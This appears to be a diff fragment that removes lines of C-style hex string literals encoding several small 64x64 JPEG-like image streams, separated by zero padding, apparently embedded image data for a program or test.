-"\x4f\x1c\xfe\x03\xf5\xae\x9c\x16\x1e\xac\x6b\x29\x4a\x2d\x25\x7f" -"\xc8\xcb\x11\x5a\x12\xa7\x68\xbb\xed\xf9\x9b\x71\x29\x8e\x3d\x86" -"\x59\x24\xe4\x9c\xc8\xd9\x3c\xd3\xaa\x2b\xab\xa8\x6d\x21\xf3\x67" -"\x7d\xab\x9c\x00\x06\x4b\x1f\x40\x3a\x93\xed\x4d\x81\x9e\xea\xd9" -"\xbe\xd5\x6c\x61\x0f\x91\xe5\xb3\x02\x4a\xfb\xe3\xa1\xf6\xaf\x76" -"\xcf\x76\x79\xb7\x4b\x44\x24\x37\xb0\xdc\x5c\xb4\x56\xfb\xa5\x08" -"\x3e\x79\x54\x7c\x80\xff\x00\x77\x3d\xcf\xd2\xa2\xd5\x75\x4b\x7d" 
-"\x2e\xdc\x3c\xe4\xbc\x8f\xc4\x50\xaf\xde\x90\xfa\x0a\x87\x53\xd4" -"\xe0\xd2\x62\x8a\xd6\xda\x11\x25\xcb\x8d\xb0\x5a\xc6\x3f\x9f\xa0" -"\xa6\x69\x5a\x43\xc5\x70\x75\x1d\x52\x41\x71\xa8\x38\xeb\xfc\x31" -"\x0f\xee\xad\x6a\xa3\x14\xb9\xa5\xb7\xe6\x64\xe7\x26\xf9\x23\xbf" -"\xe4\x52\xbc\xba\xd6\x2c\xf4\x0b\x8b\xbb\x99\x84\x77\x57\x32\x22" -"\xc3\x0a\x81\xfb\x9c\x9e\x99\xee\x71\x52\x6a\x77\x1a\xa5\xbe\xac" -"\x2d\x16\xf4\x44\x97\x88\xa2\xde\x46\x40\x42\x4a\xb8\xca\x9e\x3a" -"\x37\xf5\x15\x27\x88\x7f\x7f\xa8\xe8\xf6\x43\xfe\x5a\x5c\xf9\xad" -"\xf4\x41\x9f\xeb\x57\x35\xcd\x3f\xfb\x4f\x4d\x78\x50\xed\x9d\x4f" -"\x99\x0b\x7f\x75\xc7\x4f\xf0\xad\x14\xa2\xb9\x5b\x4b\x5b\xff\x00" -"\xc0\xfc\x8c\x9c\x64\xf9\x94\x5b\xd2\xdf\xf0\x7f\x32\xbe\x9f\xad" -"\x3c\xb3\x9b\x0d\x4a\x11\x69\xa8\x81\xf2\xab\x1f\x92\x5f\x75\x3f" -"\xd2\xae\x5b\xdf\x6f\x98\x5b\xdc\xc1\x25\xb5\xc1\xce\x15\xc6\x55" -"\xb1\xfd\xd6\x1c\x1f\xd0\xfb\x55\x1b\x51\x6b\xe2\x6d\x0d\x3e\xdd" -"\x17\xef\x50\x94\x93\x1c\x34\x72\x0e\xa4\x7a\x7a\xd4\x09\x7d\x7b" -"\xa0\xb2\xc1\xab\x96\xb8\xb1\x27\x11\xde\xa8\xc9\x5f\x40\xe3\xfa" -"\xff\x00\x3a\x97\x04\xdb\x49\x6b\xdb\xfc\xbf\xcb\xee\x29\x54\x71" -"\x49\xb7\xa7\x7f\xf3\xff\x00\x33\x7c\x2f\xdd\x2d\x82\xcb\xdf\x1d" -"\xfd\xbd\x2b\x2f\x56\xd5\xda\xde\x75\xb0\xd3\xa3\x17\x3a\x8c\x83" -"\xe5\x8c\x74\x8c\x7f\x79\xbd\x2a\x3d\x4f\x54\x9e\x5b\xb3\xa5\xe8" -"\xa0\x49\x79\xff\x00\x2d\x25\x3f\x72\x01\xea\x4f\xad\x5b\xd2\x74" -"\xa8\x34\xb8\x58\x46\x5a\x59\xe4\x39\x96\x77\xe5\xa4\x3f\xe1\x52" -"\xa2\xa0\xb9\xa7\xf2\x45\xb9\x39\xbe\x58\x7c\xdf\xf5\xd4\x8f\x49" -"\xd2\x16\xc1\x9e\xe6\xe2\x4f\xb4\xdf\xcd\xcc\xb3\xb7\xf2\x5f\x41" -"\x5a\x54\x51\x59\xca\x4e\x4e\xec\xd6\x31\x51\x56\x46\x2b\x7f\xa4" -"\x78\xd9\x07\x55\xb4\xb4\x27\xfe\x04\xc7\xfc\x2b\x6a\xb1\x34\x23" -"\xf6\x8d\x6b\x5a\xbc\x1c\x83\x32\xc0\xbf\xf0\x11\xcf\xf4\xad\xba" -"\xba\xba\x34\xbb\x24\x67\x47\x54\xe5\xdd\xb3\x06\x6c\x68\xbe\x25" -"\x59\xfe\xed\x9e\xa5\xf2\x3f\xa2\x4a\x3a\x1f\xc7\xfc\x6b\x75\xd1" 
-"\x5d\x19\x24\x50\xca\xc3\x0c\xac\x32\x08\xaa\xba\xad\x82\x6a\x5a" -"\x6c\xd6\x8e\x70\x5c\x65\x1b\xfb\xac\x3a\x1a\xaf\xe1\xeb\xf7\xbe" -"\xd3\xb6\xdc\x71\x77\x6e\xde\x4c\xea\x7a\xee\x1d\xff\x00\x1a\x72" -"\xf7\xa3\xcd\xd5\x6f\xfa\x7f\x90\xa3\xee\x4d\xc7\xa3\xd5\x7e\xa0" -"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf4\x7a\x6e\x90\x82\x28\x5e\x25\x66\x65\x46\xc0\x2c\xc5\x8f" -"\xe7\x4f\x1d\x6a\x3d\x15\x61\x4b\x77\x5b\x6d\xbe\x50\x6c\x2e\xd3" -"\x91\x8a\x48\x6f\x73\x46\x8a\x28\xa6\x20\xa2\x8a\x28\x00\xa2\x8a" -"\x28\x02\x88\x23\xd6\xa3\xd1\xde\x0f\x21\xcc\x25\x16\x22\xdf\x2e" -"\x38\x18\xa4\x16\xd0\x05\x65\x11\xa8\x0d\xd4\x7a\xd3\x6c\x6d\xe0" -"\x95\x65\x5b\x8b\x7d\x81\x64\x21\x43\xf1\x91\xea\x39\xe9\x59\xa7" -"\x3b\x6d\xf8\xff\x00\xc0\x2d\xf2\xdc\xb5\x7d\x7f\x15\x8a\xab\x4c" -"\x92\x95\x3f\xc4\x88\x58\x0f\xa9\xed\xd6\x99\x2e\xad\x6b\x0c\x85" -"\x1c\xc8\x36\x81\xbc\x84\x24\x47\x9e\x9b\x8f\x6a\x6d\xed\xac\x97" -"\xab\x6c\xd6\x93\xc4\xb1\x44\x77\x80\x57\x72\xb1\x1d\x3a\x1e\x82" -"\xa1\x9b\x4a\xb9\x76\x99\x23\xbc\x09\x0d\xce\x0c\xcb\xe5\xe4\xe7" -"\x18\x3b\x4e\x78\xcf\xe9\x53\x27\x51\x37\x64\x6b\x08\xd2\x69\x73" -"\x3f\xeb\xee\x27\x97\x58\xb4\x8a\xe1\xe1\x73\x26\x51\x95\x59\x82" -"\x12\xab\x9e\x99\x34\xb2\x6a\xb6\xb1\xdc\x18\x58\xc9\x85\x60\x8f" -"\x20\x42\x51\x58\xf6\x2d\xf8\xd4\x33\x69\x3b\xe1\xbb\x8d\x25\x0a" -"\x27\x68\xca\xf1\xf7\x42\xe3\x8f\x7e\x95\x13\xe8\x28\xd7\xb2\x4a" -"\x0c\x0d\x1c\xb2\x79\x8c\x24\x8b\x73\x0c\xf5\x00\xe7\xa5\x4b\x75" -"\x7a\x22\xa3\x1a\x1d\x5b\xfe\xad\xff\x00\x04\xb1\xaa\xdf\x4d\x6b" -"\x35\xac\x50\xae\x4c\xd2\x61\x8e\xc2\xd8\x03\xe9\xdf\xff\x00\xaf" -"\x56\x2c\x6f\x61\xbe\x87\xce\xb7\x0f\xe5\xe7\x01\x99\x48\xcf\xd2" -"\x8b\x9b\x53\x3d\xc5\xb4\x81\xf6\x88\x1c\xb6\x31\xd7\x82\x3f\xad" 
-"\x1a\x6d\xa9\xb2\xb0\x8a\xd8\xbe\xf3\x18\xc6\xec\x63\x3c\xd6\x8b" -"\x9b\x9d\xf6\x33\x6e\x1e\xcd\x77\xff\x00\x87\xff\x00\x80\x45\x45" -"\x53\x94\x5d\x48\x56\xeb\x4f\xba\x8e\x58\xd9\x41\x11\x49\xca\x30" -"\xf5\x56\x1c\x8f\xd4\x55\x91\x26\xd8\xd5\xa6\xdb\x11\x38\x04\x16" -"\x18\x04\xf6\xcf\x7a\xb6\x8c\x94\xae\x28\x40\x96\xe6\x18\x09\x81" -"\x70\x40\xf2\xc0\x1b\x7d\xc0\xe9\x52\x35\xc4\xd1\xc0\x36\x46\x26" -"\x90\x60\x7c\xcd\xb7\x3e\xa7\xa7\x5a\x6d\x14\x5c\x2c\x52\xf1\x0c" -"\xd2\x48\x96\x56\xb0\x4f\x2c\x22\xe2\xe3\x6b\xb4\x47\x6b\x6d\x0a" -"\xc4\x80\x7b\x74\x15\x59\x74\x10\xc3\x8d\x47\x53\xff\x00\xc0\xa6" -"\xa7\x6b\x92\xa4\x13\x69\xb2\x48\xca\x88\x2e\x48\x66\x63\x80\x32" -"\x8d\xde\xad\x47\xab\xd8\x22\xe3\xed\xb6\xdf\xf7\xf5\x7f\xc6\xb5" -"\xe6\x9a\x4b\x94\xc7\x96\x0e\x4f\x98\xcf\x86\x09\x74\xcd\x73\x4f" -"\x48\xaf\x6f\x24\x4b\x87\x74\x91\x26\x98\xba\x90\x10\x91\xd7\xbe" -"\x45\x5c\x9f\x54\xbc\x8f\xcf\xc4\x69\x84\x9c\xa6\xfd\x87\x6a\xae" -"\x09\x1f\x8f\x6f\xff\x00\x58\xaa\x77\x37\x96\xf7\x1a\xfe\x92\x60" -"\x9e\x29\x88\x95\xc9\x08\xe1\x88\x1b\x0f\xa5\x5c\x97\x5e\x2b\x70" -"\xc4\x40\xcb\x04\x5e\x60\x24\xf5\x72\xb8\xe8\x3b\x72\x6b\x2c\x43" -"\x7c\xb1\x6d\xd9\xff\x00\xc1\x37\xc2\xc5\x73\x49\x45\x5d\x7f\xc0" -"\x33\xa5\xb0\xbc\xd0\xa4\x6b\x9d\x1c\x35\xc5\x99\x3b\xa5\xb1\x27" -"\x3b\x7d\x4a\x7f\x87\xf3\xad\x1b\x2b\xcb\x1d\x6e\xc5\x8a\x05\x96" -"\x33\xc4\x90\xca\xa3\x2a\x7d\x08\xab\xd5\x93\xa9\x68\xbe\x6d\xcf" -"\xdb\xf4\xc9\x3e\xc9\xa8\x2f\xf1\x8f\xbb\x27\xb3\x0f\xeb\x5a\xa9" -"\x29\xfc\x5b\xf7\xff\x00\x3f\xf3\x30\x70\x70\xf8\x35\x5d\xbf\xcb" -"\xfc\x8b\xf6\xb6\xa2\xd7\x72\xc7\x34\xad\x19\xfb\xb1\xc8\xdb\x82" -"\x7d\x0f\x5c\x7b\x13\x4c\x8e\xfe\x06\xb8\x36\xf2\x6e\x82\x6c\xe1" -"\x52\x51\xb7\x7f\xba\x9e\x87\xf0\xaa\x7a\x66\xb5\xe7\xcf\xf6\x1d" -"\x46\x2f\xb1\xea\x0b\xd6\x33\xf7\x64\xf7\x43\xdf\xe9\x5a\x92\x46" -"\x92\x00\xb2\x22\xb8\x04\x10\x18\x67\x04\x77\xa9\x92\x71\x7e\xf9" -"\x71\x6a\x4b\xdc\x33\xf5\xbb\xb8\x20\x8e\x28\x2e\x2d\x16\xe5\x27" 
-"\x27\x72\xb8\x25\x54\x01\x9c\x9c\x03\xdf\xa5\x72\x57\x3a\x56\x9d" -"\x3c\xc5\xd1\x3c\x85\xec\x91\xb3\xe3\xf5\x43\x5d\xc5\xd3\x5e\x28" -"\x57\xb3\x11\x3e\x3e\xf4\x72\x12\xa5\xbe\x8d\xd8\xfd\x45\x49\x04" -"\xaf\x34\x21\xda\x29\x21\x63\xc1\x49\x3a\x8f\xca\xb4\xa7\x55\xd3" -"\x5a\x7e\x66\x55\x28\xaa\x92\xb3\xfc\x8e\x73\x42\x36\xd6\x97\x31" -"\x41\x67\xa7\x44\xd2\xc8\xc4\x3c\xca\x5b\x2a\xbd\xcf\x2b\xd3\xdb" -"\x35\xd1\x79\x10\xef\x67\xf2\x93\x73\x7d\xe3\xb4\x64\xd4\xb9\x3d" -"\xc9\xa4\xac\xaa\x4b\x9d\xde\xc6\xd4\xa2\xe9\xab\x26\x00\xff\xd9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0" -"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4" -"\x7d\x57\x49\xb2\xd5\xa0\xf2\xef\x22\xc9\x1c\xa4\x8b\xc3\xa1\xf5" -"\x06\xb2\x62\xb8\xd5\xf4\x19\x52\x0b\xe4\x93\x52\xb0\x27\x6a\x5c" -"\x46\xa4\xcb\x1f\x3c\x6f\x1d\xfe\xbf\xfe\xaa\xe9\x2a\x85\xe6\xb1" -"\x61\x65\x71\xf6\x79\xe6\x63\x28\x5d\xec\x91\xc6\xd2\x15\x5f\x56" -"\xda\x0e\xd1\xee\x6b\x48\xd4\xb2\xb3\xd5\x19\xca\x9a\x6f\x99\x68" -"\xcb\xf4\x56\x35\x8f\x88\x2d\xa5\xd2\x96\xfa\xea\x44\x54\x92\x79" -"\x22\x87\xca\x05\xfc\xd0\xae\xc1\x76\x81\x92\xc4\x81\x9e\x2b\x42" -"\xca\xfa\xda\xfe\x13\x25\xac\x9b\xc2\xb6\xd6\x04\x15\x65\x6f\x42" -"\x0f\x20\xfb\x1a\xcc\xd0\xb3\x45\x14\x50\x01\x59\xfa\x9e\x89\xa7" -"\x6a\x83\xfd\x32\xd9\x19\xfb\x48\xbf\x2b\x8f\xc4\x56\x85\x14\xd4" -"\x9c\x5d\xd0\x9c\x54\x95\x98\x56\x20\x5b\xdd\x2f\x54\xbf\x96\x2d" -"\x3d\xef\xa2\xbc\x75\x95\x1e\x27\x40\xca\xc1\x02\xed\x6d\xc4\x71" -"\xf2\xe4\x11\x9e\xa7\x8f\x5d\xba\x29\x0c\xe3\x22\xd0\xf5\x08\xed" -"\x6c\x2e\x27\xb6\x94\x49\x04\x97\x3e\x65\xbd\x95\xce\xc6\x51\x24" -"\x9b\x83\x21\xc8\x07\xa0\x18\x24\x70\x7d\xb1\x5b\x7e\x1f\xb1\x6b" -"\x63\x75\x73\x2d\xb4\xd0\x49\x70\xca\x3f\xd2\x2e\x0c\xb2\x32\xa8" -"\x38\x2d\xc9\x00\xf2\x78\x04\xf1\x8a\xd8\xa2\x80\x0a\x28\xa2\x80" 
-"\x0a\x28\xa2\x80\x31\xcd\xf6\xa4\x11\x9f\xec\xe8\x4e\xf1\x10\x8c" -"\x03\xc1\x2a\x08\x6c\xfa\x6e\x38\xfa\x52\x36\xa3\x7c\x2e\x6e\x63" -"\x10\xa9\x11\x2b\x10\x0a\x9c\xf1\xd1\x87\xae\x6a\xc8\xd4\x89\xd3" -"\x9e\xe8\xdb\xb0\x65\x70\x9b\x09\xea\x49\x00\x60\xfa\x73\x51\xff" -"\x00\x6c\x80\x70\x60\x20\xa9\xc4\x9f\x38\xe3\xe7\x2b\xc7\xf7\xb9" -"\x15\xcc\xda\x5f\x68\xeb\x49\xbf\xb0\xbb\x10\xbe\xa7\x76\xeb\x34" -"\x90\x88\xc4\x4a\xac\xd1\xb3\xc6\xdf\x30\x04\x01\xdf\xeb\x5a\xd6" -"\xee\x65\xb7\x8e\x46\x04\x16\x50\x48\x23\x1d\xbd\x3b\x56\x60\xd6" -"\x9b\x77\xcd\x68\x42\x70\x77\x79\x83\xa6\xfd\x99\xc7\xd6\xad\x5b" -"\xde\xb5\xd5\x8c\xd2\xa2\x79\x32\x46\x59\x76\xb7\xcd\xb4\x81\xde" -"\xaa\x12\x57\xde\xe4\xd4\x83\xb7\xc3\x62\xed\x15\x05\x8c\xad\x3d" -"\x85\xbc\xcf\x8d\xd2\x46\xac\x71\xd3\x24\x66\xa7\xad\x93\xba\xb9" -"\xce\xd5\x9d\x98\x51\x45\x14\xc4\x67\x08\x51\x6d\xcc\x11\x28\x8d" -"\x0f\x40\x8a\x00\x07\xd4\x0e\x99\xef\x41\x1e\x5d\xba\x11\x04\x77" -"\x33\x45\xca\xb3\xe1\x49\x3d\xce\x71\xc1\x34\xfa\x2a\x51\x6e\xef" -"\x5b\x8f\x92\x5b\x28\xc2\x09\x56\x35\xde\xc1\x14\x14\xee\x4e\x40" -"\xfc\xea\xc4\x71\x45\x1a\x15\x8a\x34\x45\x24\x92\x14\x60\x1c\xd5" -"\x4a\x69\x40\x66\x8e\x5c\xb0\x68\xf3\xb7\x0c\x40\xe7\xae\x47\x7a" -"\x7a\x09\xdc\xbe\xaa\x15\x42\xa8\x01\x40\xc0\x03\xa0\xa5\xaa\x8b" -"\x34\xc2\x72\x58\xa1\x87\x6f\x00\x03\xbb\x77\xd7\xa6\x2a\x48\xae" -"\x56\x49\x64\x8f\x63\xa6\xc2\x06\xe6\x18\x0d\x9f\x43\xde\x99\x24" -"\xf4\x53\x55\xd5\xc6\x51\x83\x0c\xe3\x20\xe6\x9d\x40\x00\xff\xd9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0" -"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xec" -"\xbf\xb3\xf5\xed\x27\x9d\x36\xf4\x6a\x36\xe3\xfe\x5d\xee\xcf\xce" -"\x07\xb3\xff\x00\x8f\x15\xa5\xa4\x6a\x8f\xa8\x89\x12\x7b\x1b\x8b" -"\x39\xe2\xc6\xf4\x95\x78\xe7\xd0\xf7\xe9\x5a\x35\x93\x26\xb5\x6f" 
-"\x65\x3d\xd9\xd4\xaf\x2d\x62\x82\x39\xd6\x18\xf6\x86\x0c\xa4\xa0" -"\x6d\xad\x9e\x32\x7a\x8c\x76\xc7\x7a\xd2\x53\xe6\x5a\xad\x4c\xe3" -"\x4f\x95\xe8\xf4\x35\xa8\xaa\x56\x3a\xad\x95\xfc\xaf\x15\xbc\xad" -"\xe6\xc6\x03\x34\x72\x46\xd1\xb8\x07\xa1\xda\xc0\x1c\x7b\xd5\xda" -"\xcc\xd0\x28\xa2\x8a\x00\xa7\x75\xa6\x59\x5d\xc9\xe6\x4d\x6e\xbe" -"\x68\xe9\x2a\xfc\xae\x3f\xe0\x43\x9a\x9a\x75\x9d\x6d\xb6\xda\x32" -"\x79\xaa\x06\xd3\x36\x48\x3f\x5c\x73\xf8\xd4\xd4\x53\xbb\x17\x2a" -"\x0a\xe2\x75\x66\x93\xfb\x62\x43\x6d\x14\x77\x12\xae\xb5\x01\x58" -"\xdd\xb0\x18\x8b\x6c\xe3\x3d\x8f\x1c\x7b\xe2\xbb\x6a\x82\x3b\x2b" -"\x48\xbf\xd5\xda\xc2\x9f\xbc\x32\xfc\xa8\x07\xce\x78\x2d\xf5\xe7" -"\xad\x21\x99\xb0\x47\x77\x7f\xae\xdb\xdf\xcd\x66\xf6\x50\xda\xc4" -"\xf1\x81\x2b\x29\x79\x0b\xed\xec\xa4\x80\xa3\x6f\xaf\x27\xe9\x5b" -"\x34\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05" -"\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x05" -"\x14\x51\x40\x05\x14\x51\x40\x05\x14\x51\x40\x00\xff\xd9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11" -"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff" -"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xcb\x49" -"\xae\xdd\x99\x2e\xed\x44\x25\x47\x0e\x92\x06\x56\xfa\x74\x3f\xa5" -"\x59\xa2\x8a\x6f\x51\x25\x60\xa2\x8a\x29\x0c\x28\xa2\x8a\x00\x28" -"\xa2\x8a\x00\x2a\x84\xf7\x97\xd1\xfd\xab\xca\xd2\xe4\x9b\xca\x64" -"\x11\x62\x54\x1e\x70\x38\xdc\x46\x4f\x1b\x72\x7a\xf5\xc7\x15\x7e" -"\x8a\x00\xaf\x0c\xd3\xbd\xd5\xc4\x52\x5a\xb4\x51\x46\x57\xcb\x94" -"\xb8\x22\x5c\x8c\x9c\x01\xc8\xc1\xe3\x9a\xb1\x45\x14\x00\x51\x45" -"\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45" -"\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45\x14\x00\x51\x45" -"\x14\x00\x51\x45\x14\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03" -"\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00" -"\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x0a\x28\xa4\x66\x55\xc6\xe2\x06\x4e\x06\x4d\x00\x2d\x15\x5d\xee" -"\x76\xce\x23\x58\x9d\x94\xa9\x26\x41\x8d\xa0\xfa\x7a\xe7\xf0\xa8" -"\x77\x4b\xe6\xc8\xcd\x33\x15\x6c\x6d\x4c\x00\x13\xf1\xea\x73\xef" -"\x40\x17\xa8\xa2\xa0\x6b\xa8\xd6\xe3\xc8\x3b\xcb\xed\xdf\x90\xa7" -"\x18\xce\x3a\xf4\xcf\xb5\x00\x4f\x4c\x96\x41\x1c\x6c\xe4\x13\x81" -"\x9c\x01\x92\x7e\x95\x58\x4d\x39\x79\x37\x32\x6c\x27\xe4\x0a\x0e" -"\x40\xf7\x3d\xea\x28\xa2\x8e\x14\xd9\x12\x04\x52\x4b\x60\x7a\x9e" -"\xa6\x8b\x85\x99\x2c\xb3\xc9\x35\xb0\x36\xe5\xa0\x76\x00\xe5\xd3" -"\x25\x7d\x46\x33\xd6\x9b\x2a\xac\xce\x8f\x22\x2b\x32\x1c\xa1\x20" -"\x1d\xa7\xd4\x7a\x51\x45\x2b\x8e\xc1\x45\x14\x52\x28\xbd\x54\x73" -"\x29\x67\xf3\x82\x86\xde\xd8\xda\x78\xdb\x9e\x3f\x1c\x55\xea\xa3" -"\x89\x43\x3f\x9c\xea\xcd\xbc\x90\x54\x63\x0b\x9e\x07\xd7\x15\x4f" -"\x62\x16\xe1\x45\x14\x54\x96\x14\x51\x45\x00\x14\x51\x45\x00\x00" -"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" -"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" -"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" -"\x00\xf5\x5a\x28\xa2\x80\x0a\x2a\x29\xee\x21\xb7\xf2\xfc\xe9\x15" -"\x3c\xc6\x08\x99\x3f\x79\x8f\x61\x51\xc9\x71\x20\x9d\x56\x34\x53" -"\x16\x0e\xe6\x2d\x82\x0f\x60\x06\x28\x02\xcd\x57\x5b\xb8\x64\x0f" -"\xe5\x36\xe2\x8c\x50\xf0\x47\x22\xa0\xc1\xf3\x9e\x52\xf2\x12\xe0" -"\x02\xa5\x8e\xd1\x8f\x41\xd0\x52\xd2\xb8\xec\xc6\xb1\x92\xe2\xd3" -"\xc9\xbb\xdb\x97\x18\x71\x11\x20\x7e\x07\xad\x38\x0c\x00\x07\x41" -"\xc5\x14\x50\xdd\xc6\x95\x8b\x3f\x68\x89\x91\x9a\x37\x59\x0a\x92" -"\x30\xac\x0f\x23\xb5\x56\x92\x49\x6e\x6c\xc2\x36\xfb\x67\x75\x1b" 
-"\xbc\xb7\x05\x94\xfa\x03\x48\xaa\xaa\x30\xaa\x14\x67\x38\x03\x14" -"\xb4\x5f\xb0\xb9\x7b\x8a\x49\x3d\x49\x34\x94\x51\x48\xa0\xa2\x8a" -"\x28\x00\xa2\x8a\x6c\xd2\xc7\x04\x4d\x2c\xd2\x2c\x71\xa8\xcb\x33" -"\x1c\x01\x40\x87\x51\x45\x14\x0c\x28\xa2\x8a\x00\x28\xa0\xf0\x32" -"\x6a\xa5\xb5\xdc\xb7\x73\x07\x82\x1d\xb6\x83\x3f\xbd\x93\x21\xa4" -"\xf4\xda\xbe\x9e\xe7\xf0\xa6\x95\xc9\x6d\x2d\x05\xb9\xbe\x48\x65" -"\xf2\x21\x46\xb8\xb9\x23\x22\x14\x3d\x07\xab\x1e\x8a\x3e\xbf\x86" -"\x6a\x69\x6d\xe1\x9d\xa3\x69\xa2\x57\x68\x8e\xe4\xdc\x33\xb4\xfa" -"\xd3\xc2\xaa\xb3\x32\xa8\x05\xb9\x62\x07\x27\xeb\x4b\x45\xfb\x05" -"\xbb\x85\x14\x51\x48\xa0\xa8\xae\xa6\x68\x22\xdc\x90\xc9\x33\x93" -"\x85\x48\xc7\x53\xee\x7a\x01\xee\x6a\x5a\x29\xa1\x32\x0b\x45\xba" -"\x08\xcd\x78\xe8\x5d\x8e\x42\x46\x3e\x58\xc7\xa6\x7a\x9f\xad\x4f" -"\x45\x9c\x45\xde\x77\x90\x4c\x06\xfd\xaa\x1c\x8d\xb8\x00\x72\xb8" -"\xed\xcf\x7f\x4a\xce\x7d\x5e\xd6\x16\xb8\x16\xc9\x71\x78\x56\x4c" -"\x7c\xcc\x02\xfb\x85\x3e\x82\x94\xe4\xa2\xb9\xa4\xec\x85\x0b\xbd" -"\x16\xa6\x8d\x15\x90\x9a\xc1\x86\xdd\x40\xb3\xb8\x9d\xd8\xb1\x6d" -"\xf3\x2e\x53\x9e\x06\x7b\xd3\x97\x55\x54\x22\xdf\xec\xf7\x2f\x1e" -"\x31\xf6\x86\x95\x77\xfd\x71\xeb\x58\xfd\x62\x8f\xf3\xaf\xbc\xd3" -"\xd9\xd4\xfe\x56\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" -"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" -"\x11\x03\x11\x00\x3f\x00\xf4\x7a\x28\xa2\xa4\xb0\xa2\x9a\xf2\x24" -"\x6a\x1a\x47\x54\x04\x80\x0b\x1c\x72\x7a\x0a\x82\xee\xde\x7b\x86" -"\x58\xd6\xe0\xc3\x06\x3f\x79\xb3\x89\x1b\xd8\x1e\xc3\xf5\xa6\x91" -"\x2d\xdb\x62\x5b\x86\x99\x61\x63\x6f\x1a\xc9\x2f\x45\x0e\xdb\x47" -"\xd4\x9a\x65\xa4\x12\xc4\x19\xa7\xb8\x69\xe5\x7c\x6e\x3d\x14\x7b" -"\x2a\xf6\x1f\xad\x49\x0c\x51\xc1\x0a\x43\x0a\x04\x8d\x06\x15\x47" -"\x61\x4f\x24\x2a\x96\x62\x00\x03\x24\x9e\x82\x8b\xf4\x41\x6d\x6e" 
-"\xc5\xeb\x58\x17\x9a\x85\xd6\xab\x72\xfa\x76\x88\xc1\x51\x78\xb8" -"\xbd\xea\xb1\xfb\x2f\xa9\xff\x00\x3e\xf4\xc9\xae\x6e\x7c\x43\x33" -"\xda\xe9\xce\xd0\x69\xca\x76\xcd\x74\x38\x32\x7a\xaa\x7f\x8f\xf9" -"\x3b\x76\x76\x90\x58\xda\xa5\xb5\xac\x62\x38\x93\xa0\x1f\xcc\xfa" -"\x9a\xd6\xca\x9e\xb2\xdf\xb7\x6f\x5f\xf2\x31\xbb\xab\xa4\x76\xef" -"\xdf\xd3\xfc\xc9\xaa\x25\xb9\x85\xae\x9a\xd9\x64\x56\x99\x17\x73" -"\x20\xe7\x68\xf7\xf4\xa6\xc7\x22\xde\xd9\x96\x4f\x3a\x25\x90\x10" -"\xac\x46\xc6\xc7\xf7\x87\x71\xed\x4e\xb6\xb6\x86\xd2\x11\x15\xbc" -"\x62\x34\xce\x70\x3a\x93\xea\x4f\x73\xee\x6b\x2b\x25\xb9\xb5\xdb" -"\xdb\x62\x25\xb1\x8c\xdd\xfd\xaa\xe1\xda\x79\x14\x9f\x2f\x7f\xdd" -"\x88\x7f\xb2\x3d\x7d\xfa\xd5\xaa\x2a\x1b\xcb\xb8\x2c\xad\x5e\xe2" -"\xea\x41\x1c\x48\x32\x49\xfe\x43\xd4\xd3\xd6\x4e\xc1\x65\x15\x71" -"\xf3\x4b\x1c\x10\xb4\xb3\x3a\xc7\x1a\x0c\xb3\x31\xc0\x02\xb0\x33" -"\x73\xe2\x79\x08\x1e\x65\xb6\x8e\xa7\xd3\x0f\x73\x8f\xe4\xbf\xe7" -"\xe8\xb0\xdb\xdc\xf8\x8e\x55\xba\xd4\x11\xa0\xd3\x14\xee\x86\xd7" 